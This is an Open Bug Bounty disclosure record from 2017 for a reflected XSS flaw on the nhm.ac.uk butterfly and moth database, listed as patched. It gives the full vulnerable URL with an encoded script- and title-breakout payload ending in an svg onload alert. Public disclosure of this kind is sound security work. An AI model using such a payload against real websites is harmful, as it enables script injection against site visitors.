nhm.ac.uk XSS vulnerability

2017-01-30T21:55:00
ID OBB:210176
Type openbugbounty
Reporter SonnySpooks
Modified 2017-03-01T18:34:00

Description

Vulnerable URL:
http://www.nhm.ac.uk/our-science/data/butmoth/search/GenusDetails.dsml?NUMBER=--%3E%3C/script%3E%3C/title%3E%22%3E%3Csvg/onload=alert(/XSSPOSED/)%3E&SUPERFAMIL=NEPTICULOIDEA&AUTHORqtype=equals&sort=GENUS&SUBTRIBEqtype=equals&YEARqtype=equals&GENUSqtype=equals&TRIBEqtype=equals&SUBFAMILY=Subfamily+unassigned&SUBFAMILYqtype=equals&FAMILYqtype=equals&beginIndex=0&listPageURL=GenusList3.dsml%3FSUPERFAMIL%3DNEPTICULOIDEA%26AUTHORqtype%3Dequals%26sort%3DGENUS%26SUBTRIBEqtype%3Dequals%26YEARqtype%3Dequals%26GENUSqtype%3Dequals%26TRIBEqtype%3Dequals%26SUBFAMILY%3DSubfamily%2Bunassigned%26SUBFAMILYqtype%3Dequals%26FAMILYqtype%3Dequals&searchPageURL=index.dsml%3FSUPERFAMIL%3DNEPTICULOIDEA%26AUTHORqtype%3Dequals%26sort%3DGENUS%26SUBTRIBEqtype%3Dequals%26YEARqtype%3Dequals%26GENUSqtype%3Dequals%26TRIBEqtype%3Dequals%26SUBFAMILY%3DSubfamily%2Bunassigned%26SUBFAMILYqtype%3Dequals%26FAMILYqtype%3Dequals

Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 56504
VIP website status:| No
Check nhm.ac.uk SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 30 January, 2017 21:55 GMT
Generic security notifications sent to website owner| 30 January, 2017 21:57 GMT
Vulnerability details disclosed by researcher| 6 February, 2017 22:14 GMT
Vulnerability patched by the website owner| 1 March, 2017 18:34 GMT